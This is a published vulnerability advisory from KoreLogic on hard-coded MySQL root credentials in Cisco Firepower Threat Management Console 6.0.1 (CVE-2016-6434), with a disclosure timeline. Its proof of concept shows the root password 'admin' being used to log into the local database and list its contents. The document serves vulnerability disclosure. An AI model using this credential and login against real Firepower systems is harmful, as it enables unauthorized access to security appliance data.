KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials

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KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL

Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
Advisory ID: KL-001-2016-005
Publication Date: 2016.10.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt

1. Vulnerability Details

     Affected Vendor: Cisco
     Affected Product: Firepower Threat Management Console
     Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
     Platform: Embedded Linux
     CWE Classification: CWE-798: Use of Hard-coded Credentials
     Impact: Authentication Bypass
     CVE-ID: CVE-2016-6434

2. Vulnerability Description

     The root account for the local MySQL database has poor password

3. Technical Description

     root@firepower:/Volume/6.0.1# mysql -u root --password=admin
     Warning: Using a password on the command line interface can be insecure.
     Welcome to the MySQL monitor.  Commands end with ; or \g.
     Your MySQL connection id is 23348
     Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise
Server - Advanced Edition (Commercial)

     Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

     Oracle is a registered trademark of Oracle Corporation and/or its
     affiliates. Other names may be trademarks of their respective

     Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

     mysql> show databases;
     | Database           |
     | information_schema |
     | Sourcefire         |
     | external_data      |
     | external_schema    |
     | mysql              |
     | performance_schema |
     | sfsnort            |
     7 rows in set (0.00 sec)


     Note that mysqld listens only on loopback, so a remote attacker
     would have to leverage some other condition to be able to reach
     the mysql daemon.

4. Mitigation and Remediation Recommendation

     The vendor has acknowledged this vulnerability
     but has not released a fix for the
     issue. Vendor acknowledgement available at:


5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
     2016.06.30 - Cisco acknowledges receipt of vulnerability report.
     2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
                  this vulnerability and for 3 others reported in the
                  same product.
     2016.08.12 - 30 business days have elapsed since the vulnerability was
                  reported to Cisco.
     2016.09.02 - 45 business days have elapsed since the vulnerability was
                  reported to Cisco.
     2016.09.09 - KoreLogic asks for an update on the status of the
                  remediation efforts.
     2016.09.15 - Cisco confirms remediation is underway and soon to be
     2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
                  will be released publicly on 2016.10.05.
     2016.10.05 - Public disclosure.

7. Proof of Concept

     See Technical Description

The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.

Our public vulnerability disclosure policy is available at:

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